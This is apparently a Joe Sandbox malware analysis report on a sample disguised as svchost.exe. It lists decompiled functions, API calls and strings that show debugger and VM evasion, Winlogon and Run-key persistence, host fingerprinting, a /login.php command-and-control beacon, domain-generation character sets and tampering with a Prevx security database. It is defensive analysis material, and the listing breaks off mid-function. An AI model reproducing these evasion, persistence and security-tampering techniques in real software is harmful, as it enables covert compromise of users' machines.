Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessValue$Open$AllocChangeFlushFreeNotifyPathQueryValidatememset$AdminCloseCreateEventExistsFileNameObjectShortSingleUserWait
String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 2447656991-2103896814
Opcode ID: 280ae55d33dd991ce1a4d83d697ceb5fc95aedbe85cf1aba4350f7c46aa97432
Instruction ID: 4696071ae73de276f437613ca632511ad541cd357507955c84f53b87d65649bf
Opcode Fuzzy Hash: 280ae55d33dd991ce1a4d83d697ceb5fc95aedbe85cf1aba4350f7c46aa97432
Instruction Fuzzy Hash: C081B3B1A84706BBFB218B64EC8DFAAB769EB48B05F504504F945A7380D7B1DD44CBB0

Function 02D263B0 Relevance: 61.6, APIs: 29, Strings: 6, Instructions: 303
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02D263D8
DnsFlushResolverCache.DNSAPI ref: 02D263FC
gethostbyname.WS2_32(02D26C17), ref: 02D26406
GetTempPathA.KERNEL32(00000104,?), ref: 02D26420
GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02D26438
calloc.MSVCRT ref: 02D264D6
exit.MSVCRT ref: 02D264E5
calloc.MSVCRT ref: 02D264EE
exit.MSVCRT ref: 02D264F8
calloc.MSVCRT ref: 02D26516
exit.MSVCRT ref: 02D26522
calloc.MSVCRT ref: 02D2652B
exit.MSVCRT ref: 02D26535
calloc.MSVCRT ref: 02D26553
exit.MSVCRT ref: 02D26560
calloc.MSVCRT ref: 02D2656A
exit.MSVCRT ref: 02D26575

Part of subcall function 02D21970: free.MSVCRT(00000000,00000000,00000000,00000001,?,02D266C8,?), ref: 02D219A7
Part of subcall function 02D21970: free.MSVCRT(00000000,00000000,00000000,00000001,?,02D266C8,?), ref: 02D219BB

calloc.MSVCRT ref: 02D26598
exit.MSVCRT ref: 02D265A5
calloc.MSVCRT ref: 02D265AF
exit.MSVCRT ref: 02D265BE
_strrev.MSVCRT ref: 02D26628
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 02D266EF
HeapValidate.KERNEL32(00000000), ref: 02D266F2
GetProcessHeap.KERNEL32(00000000,?), ref: 02D266FF
HeapFree.KERNEL32(00000000), ref: 02D26702
PathFileExistsA.SHLWAPI(?), ref: 02D2670F
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D26722
DeleteFileA.KERNEL32(?), ref: 02D2672F

Strings

10001, xrefs: 02D265E9
6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02D265CC
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D2645D, 02D2646D, 02D26491
!verif, xrefs: 02D263DD
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D26454
/login.php, xrefs: 02D26475, 02D26499

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: callocexit$FileHeap$PathProcessTempfree$AttributesCacheDeleteExistsFlushFreeNameResolverValidate_strrevgethostbynamememset
String ID: !verif$/login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
API String ID: 3012421807-801546749
Opcode ID: ee5fc41179d8c5922cdc2c2926c29d63758ca299c2d9a95ab514173256a9fbb9
Instruction ID: 57e8b1880e43c19d660faf9b25cf465d65230e83b6718ecdb6aaf64f34b25ef4
Opcode Fuzzy Hash: ee5fc41179d8c5922cdc2c2926c29d63758ca299c2d9a95ab514173256a9fbb9
Instruction Fuzzy Hash: 60B1E570940325ABDB209F649C88BAA7BBCEF55705F044498E645AB380D7B5DE48CBF0

Function 02D23220 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 185
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02D23246

Part of subcall function 02D44C00: memset.MSVCRT ref: 02D44C33
Part of subcall function 02D44C00: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02D44C42
Part of subcall function 02D44C00: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02D44C49
Part of subcall function 02D44C00: memset.MSVCRT ref: 02D44C61
Part of subcall function 02D44C00: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D44C78
Part of subcall function 02D44C00: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02D44C7E
Part of subcall function 02D44C00: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D44C9F
Part of subcall function 02D44C00: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000), ref: 02D44CC6
Part of subcall function 02D44C00: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000), ref: 02D44CDA

Part of subcall function 02D44D00: memset.MSVCRT ref: 02D44D34
Part of subcall function 02D44D00: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02D44D43
Part of subcall function 02D44D00: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02D44D4A
Part of subcall function 02D44D00: memset.MSVCRT ref: 02D44D62
Part of subcall function 02D44D00: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02D44D79
Part of subcall function 02D44D00: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02D44D7F
Part of subcall function 02D44D00: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02D44DA0
Part of subcall function 02D44D00: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02D44DC7
Part of subcall function 02D44D00: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02D44DDB

GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,76EEC3F0), ref: 02D23284
PathAddBackslashA.SHLWAPI(?,?,?,76EEC3F0), ref: 02D23291
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,76EEC3F0), ref: 02D232A8
RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,76EEC3F0), ref: 02D232CE
RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,76EEC3F0), ref: 02D232EF
RegCloseKey.ADVAPI32(?,?,?,76EEC3F0), ref: 02D232F9
CharUpperA.USER32(00000000,?,?,76EEC3F0), ref: 02D2331F
CharUpperA.USER32(00000000,?,?,?,76EEC3F0), ref: 02D23328
_snprintf.MSVCRT ref: 02D23341
_snprintf.MSVCRT ref: 02D2339F
GetProcessHeap.KERNEL32(00000000,00000000,?,?,76EEC3F0), ref: 02D233CE
HeapValidate.KERNEL32(00000000,?,?,76EEC3F0), ref: 02D233D7
GetProcessHeap.KERNEL32(00000000,02D368CF,?,?,76EEC3F0), ref: 02D233E3
HeapFree.KERNEL32(00000000,?,?,76EEC3F0), ref: 02D233E6
GetProcessHeap.KERNEL32(00000000,?,?,?,76EEC3F0), ref: 02D233F6
HeapValidate.KERNEL32(00000000,?,?,76EEC3F0), ref: 02D233F9
GetProcessHeap.KERNEL32(00000000,?,?,?,76EEC3F0), ref: 02D23405
HeapFree.KERNEL32(00000000,?,?,76EEC3F0), ref: 02D23408

Strings

InstallDate, xrefs: 02D232E9
SYSTEM, xrefs: 02D23317, 02D23331
SystemDrive, xrefs: 02D2327F
SYSTEM!528110!3DEABDE9, xrefs: 02D23238, 02D2333C, 02D23343, 02D233A1
%02X, xrefs: 02D23391
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 02D232C4
%53%59%53%54%45%4D%21%35%32%38%31%31%30%21%33%44%45%41%42%44%45%39, xrefs: 02D23360, 02D23375
%s!%s!%08X, xrefs: 02D23332

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$memset$Name$CharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$AllocAllocateBackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
String ID: %02X$%53%59%53%54%45%4D%21%35%32%38%31%31%30%21%33%44%45%41%42%44%45%39$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!528110!3DEABDE9$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
API String ID: 3299431409-4268508191
Opcode ID: c19a991c08fbdfbf5e5370d85537b36fae799228718fc7da7bf870341f8fded1
Instruction ID: 7dd2c1cb86376f163c59a3d0c8689f8ca0b285e4511f285e31c9802091319d0d
Opcode Fuzzy Hash: c19a991c08fbdfbf5e5370d85537b36fae799228718fc7da7bf870341f8fded1
Instruction Fuzzy Hash: 5C51D271E00215ABEB209BA5AC8DFAB7BB8EF98704F444585F545D7300EA749E48CBB0

Function 004021B0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004022F3
DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402323
CloseHandle.KERNEL32(00000000), ref: 0040232A

Strings

m, xrefs: 004022CD
t, xrefs: 004022D4
g, xrefs: 00402279
\\.\KmxAgent, xrefs: 004021C8
S, xrefs: 00402295
E, xrefs: 0040229C
d, xrefs: 00402253
E, xrefs: 004022A3
T, xrefs: 004022AA
e, xrefs: 0040226B
0, xrefs: 004022BF
4, xrefs: 004022B8
m, xrefs: 004022E2
D, xrefs: 004022B1
", xrefs: 00402287
s, xrefs: 00402272
t, xrefs: 004022E9
", xrefs: 0040225A

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
API String ID: 33631002-3172865025
Opcode ID: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
Instruction ID: 9d4a94b5be36249e2462cbbb3280e2e36e0391c5559e4b339ada8e43b165569f
Opcode Fuzzy Hash: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
Instruction Fuzzy Hash: D04194B0D01358DEEB20CF95D9887DEFEB5BB04309F5081ADD5186B241C7B90A89CF55

Function 02D27220 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 142
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a1633ec9a,76EEC3F0,?,?,02D322F0,00000000,00000001), ref: 02D27246
GetFileSizeEx.KERNEL32(00000000,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27264
GetProcessHeap.KERNEL32(00000008,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D2728D
RtlAllocateHeap.NTDLL(00000000,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27294
memset.MSVCRT ref: 02D272A7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D272D3
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D272E3
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D272F2
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D27305
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27314
HeapValidate.KERNEL32(00000000), ref: 02D2731B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27328
HeapFree.KERNEL32(00000000), ref: 02D2732F
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D2734F
FindCloseChangeNotification.KERNEL32(00000000), ref: 02D27360
IsBadWritePtr.KERNEL32(00000000,00000004,?,a1633ec9a,76EEC3F0,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27370

Strings

a1633ec9a, xrefs: 02D27227

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
String ID: a1633ec9a
API String ID: 213124939-972184491
Opcode ID: a1d4bb93cd79c3f812744339e6142818ad94688ae9483c155f1500f5e0774747
Instruction ID: e1c74dba74316b7f22476204b10073ec95081f21b0b8cff36019ae1627b55a5a
Opcode Fuzzy Hash: a1d4bb93cd79c3f812744339e6142818ad94688ae9483c155f1500f5e0774747
Instruction Fuzzy Hash: E5419171A81314BBEB309FA5AC4CF9BBBA8EB54B14F508514FA55E6380D7748D44CBA0

Function 00401130 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 132
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00401152
memset.MSVCRT ref: 00401171
IsUserAnAdmin.SHELL32 ref: 0040118A
RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,?,?,?,?,?,00000000), ref: 004011B0
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,?,?,?,00000000), ref: 004011CF
PathAddBackslashA.SHLWAPI(?,?,?,?,?,?,00000000), ref: 004011DC
GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 004011F3
_snprintf.MSVCRT ref: 0040120E
RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000104,7604DB30), ref: 00401275
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000102,?,?,?,?,?,?,00000000), ref: 00401294
RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 004012B0
RegFlushKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012BE
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012C8

Strings

userinit, xrefs: 004012AA
software\microsoft\windows\currentversion\run, xrefs: 0040128A
software\microsoft\windows nt\currentversion\winlogon, xrefs: 004011A6
SystemDrive, xrefs: 004011CA

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Valuememset$AdminBackslashCloseCreateEnvironmentFlushInformationOpenPathUserVariableVolume_snprintf
String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 1223198359-2324515132
Opcode ID: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
Instruction ID: 4a3cd719fa0b6a36e3fea1ee33c0aaef39b8e779ef0c2e0c240036d9f7b98d71
Opcode Fuzzy Hash: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
Instruction Fuzzy Hash: 5341BEB164020CBFEB10DBA49DC9EEA777CEB94704F0041B9F345B6191E6B45F888BA4

Function 02D26110 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02D26180
memset.MSVCRT ref: 02D2619A
memset.MSVCRT ref: 02D261B4
strtol.MSVCRT ref: 02D2622A
strstr.MSVCRT ref: 02D262AA

Strings

1676d5775e05c50b46baa5579d4fc7, xrefs: 02D261D4
qwrtpsdfghjklzxcvbnm, xrefs: 02D26119
eyuioa, xrefs: 02D2613F
%s%s, xrefs: 02D26391

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: memset$strstrstrtol
String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
API String ID: 600650289-3097137778
Opcode ID: f05dd0fdd128a9c2338325cfc6c244b22310001a596dc2c53c4ed83e3d68785f
Instruction ID: 9aa08610b9e181cb9bbe663269568dd9ede6287ed1b0b8288bfc58a4ff4d1bd4
Opcode Fuzzy Hash: f05dd0fdd128a9c2338325cfc6c244b22310001a596dc2c53c4ed83e3d68785f
Instruction Fuzzy Hash: 09715830E443555FDB15CB68AC84BDEBBB9EF68704F0444A8D988E7381D7709E99CBA0

Function 02D23440 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 128
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02D2347B
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02D2349A
PathAddBackslashA.SHLWAPI(?), ref: 02D234A7
GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02D234C4
_snprintf.MSVCRT ref: 02D234DF
RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02D23503
RegQueryValueExA.KERNEL32(00000000,?,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D2351F
PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D235AD
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02D235CC
RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D235E6
RegCloseKey.KERNEL32(00000000), ref: 02D235F5

Strings

C:\Windows\apppatch\svchost.exe, xrefs: 02D2350C, 02D2358E, 02D23593, 02D235A8, 02D235D5
SystemDrive, xrefs: 02D23491
userinit, xrefs: 02D235E0
software\microsoft\windows\currentversion\run, xrefs: 02D235C2
software\microsoft\windows nt\currentversion\winlogon, xrefs: 02D234F9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: OpenPathQueryValue$BackslashCloseEnvironmentExistsFileInformationVariableVolume_snprintfmemset
String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 3269704094-4271125494
Opcode ID: 74d1a47187b2e0a0405ec22b056fddf9072c861ffd8d7149041070e3b7d8b68a
Instruction ID: 836802f09f5bf6a3c8e96350a357ea2d13edaade3a7acd277564642c0af022a9
Opcode Fuzzy Hash: 74d1a47187b2e0a0405ec22b056fddf9072c861ffd8d7149041070e3b7d8b68a
Instruction Fuzzy Hash: 7841CC71A8020DBBFB14CB54EC8EFED7779EF54704F504598E545A7280E6B49E88CBA0

Function 00401000 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 104
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00401014
FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
memset.MSVCRT ref: 0040104B
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
Process32First.KERNEL32 ref: 00401071
StrStrIA.SHLWAPI(?,wireshark.exe), ref: 0040108D
Process32Next.KERNEL32(00000000,?), ref: 0040109D
GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
FindCloseChangeNotification.KERNEL32(00000000), ref: 004010CB
PathFileExistsA.SHLWAPI(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104

Strings

\\?\globalroot\systemroot\system32\vmx_fb.dll, xrefs: 004010FF
vmwaretray.exe, xrefs: 004010F1
idag.exe, xrefs: 004010E3
wireshark.exe, xrefs: 00401083
dumpcap.exe, xrefs: 004010D5
OLLYDBG, xrefs: 00401025

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FindProcess32$ChangeCloseCreateDebuggerExistsFileFirstHandleInformationNextNotificationPathPresentSnapshotToolhelp32Windowmemset
String ID: OLLYDBG$\\?\globalroot\systemroot\system32\vmx_fb.dll$dumpcap.exe$idag.exe$vmwaretray.exe$wireshark.exe
API String ID: 1862551656-1290435522
Opcode ID: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
Instruction ID: c60aa232edd69d9eafc6284c2fbf788a46e5342051cb1b5dbcb922c87a134ace
Opcode Fuzzy Hash: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
Instruction Fuzzy Hash: AB31E9B160430057D310AB66AC49B6BB7ECDBD8764F01013BFF44F62E1E77C888586AA

Function 02D21720 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 104processCOMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(02D26C17,00000000,?), ref: 02D21734
FindWindowA.USER32(OLLYDBG,00000000), ref: 02D2174A
memset.MSVCRT ref: 02D2176B
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D21776
Process32First.KERNEL32 ref: 02D21791
StrStrIA.SHLWAPI(?,wireshark.exe), ref: 02D217AD
Process32Next.KERNEL32(00000000,?), ref: 02D217BD
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D217D9
FindCloseChangeNotification.KERNEL32(00000000), ref: 02D217EB
PathFileExistsA.SHLWAPI(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 02D21824

Strings

wireshark.exe, xrefs: 02D217A3
OLLYDBG, xrefs: 02D21745
idag.exe, xrefs: 02D21803
vmwaretray.exe, xrefs: 02D21811
dumpcap.exe, xrefs: 02D217F5
\\?\globalroot\systemroot\system32\vmx_fb.dll, xrefs: 02D2181F

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: FindProcess32$ChangeCloseCreateDebuggerExistsFileFirstHandleInformationNextNotificationPathPresentSnapshotToolhelp32Windowmemset
String ID: OLLYDBG$\\?\globalroot\systemroot\system32\vmx_fb.dll$dumpcap.exe$idag.exe$vmwaretray.exe$wireshark.exe
API String ID: 1862551656-1290435522
Opcode ID: ce6421b2d2444c25b49b855bd033f18d0e3627447580b0992b8399903382df4b
Instruction ID: da64432905578c29570c9903b16bcbbe2c1fadd0810e65cfe9f4266b8be073c6
Opcode Fuzzy Hash: ce6421b2d2444c25b49b855bd033f18d0e3627447580b0992b8399903382df4b
Instruction Fuzzy Hash: 2631F7726003616BE210AA65B84CBABB798DFD575CF444529F849C2341FB70CC5CCAB2

Function 00402520 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040253C
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025A0
SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025C3
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025D8
SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004025E4
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F3
SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004025FF
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040260E
SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040261A
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402629
SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402635
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402644
CloseHandle.KERNEL32(00000000), ref: 00402647

Strings

\PrevxCSI\csidb.csi, xrefs: 0040255A

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$PointerWrite$CloseCreateFolderHandlePath
String ID: \PrevxCSI\csidb.csi
API String ID: 606440919-2829233815
Opcode ID: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
Instruction ID: 03c6ffd3b6dc1066bd99cfbbbb98c4e24752acf73b2e09b6b1ad6d20697dc7f7
Opcode Fuzzy Hash: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
Instruction Fuzzy Hash: FB312A716842187EF311EB90DD9AFEA7768EB89B00F104155F304AA1D0DBF1AA45CBE9

Function 00401FB0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401FD6
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
GetLastError.KERNEL32 ref: 00401FF0
SwitchToThread.KERNEL32 ref: 00401FFF
